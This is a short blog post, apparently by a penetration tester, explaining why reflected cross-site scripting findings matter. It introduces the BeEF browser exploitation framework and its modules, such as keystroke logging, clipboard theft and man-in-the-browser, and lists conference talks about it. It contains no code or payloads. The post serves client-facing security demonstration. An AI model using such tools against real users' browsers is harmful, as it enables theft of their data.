THAT LITTLE BOX IS NOT FUNNY ANYMORE!
As penetration testers, I reckon at least in 85-90% web application audits, we find no less than one cross-site scripting vulnerability – mostly reflective. There used to be a time when you show that little pop-up box echoing “123” to the customers and tell them “you have XSS vulnerability on your application” only to see them smile and throw out a funny question at you – “now what is that little box going to do to me?”
Gone are those days when you had a tough time explaining what exactly a XSS vulnerability can do to an application. Now with the inception of this powerful tool called BeEF(Browser Exploitation Framework), it has become a lot easier to demonstrate the attack and thus convey to the customer the criticality of a XSS vulnerability and the damage it can do.
BeEF is essentially a powerful framework developed originally by Wade Alcorn and is integrated with wide range of client-side attack vectors and payloads targeting the inherent browser vulnerabilities. It is an open-source project which has been gaining a lot of popularity since its release and finds its place in any pen-testers’ toolkit. The development process has been steady and there are new modules being added to the framework by independent programmers which make BeEF real spicy. The current modules include the first public inter-protocol exploit, keystroke logger, clipboard theft, browser proxying, man-in-the-browser and many more.
Now we know how bad those little boxes can be!
To read further on this, please check out the following references:
• 2011 : Ground BeEF: Cutting, devouring and digesting the legs off a browser, Michele “antisnatchor” Orru( Slides )
• 2012 : I’m the butcher do you want some BeEF, Michele “antisnatchor” Orru ( Slides )
• 2012 : Shake Hooves With BeEF, Christian “xntrik” Frichot ( Slides )
• 2012 : Hookin’ Ain’t Easy, BeEF Injection with MITM, Ryan Linn & Steve Ocepek ( Slides )
• 2012 : Advances in BeEF, Michele “antisnatchor” Orru ( Slides )
• 2012 : Exploiting internal network vulns via the browser using BeEF Bind, Michele “antisnatchor” Orru & Ty Miller ( Slides )
• 2012 : All you ever wanted to know about BeEF, Michele “antisnatchor” Orru ( Slides )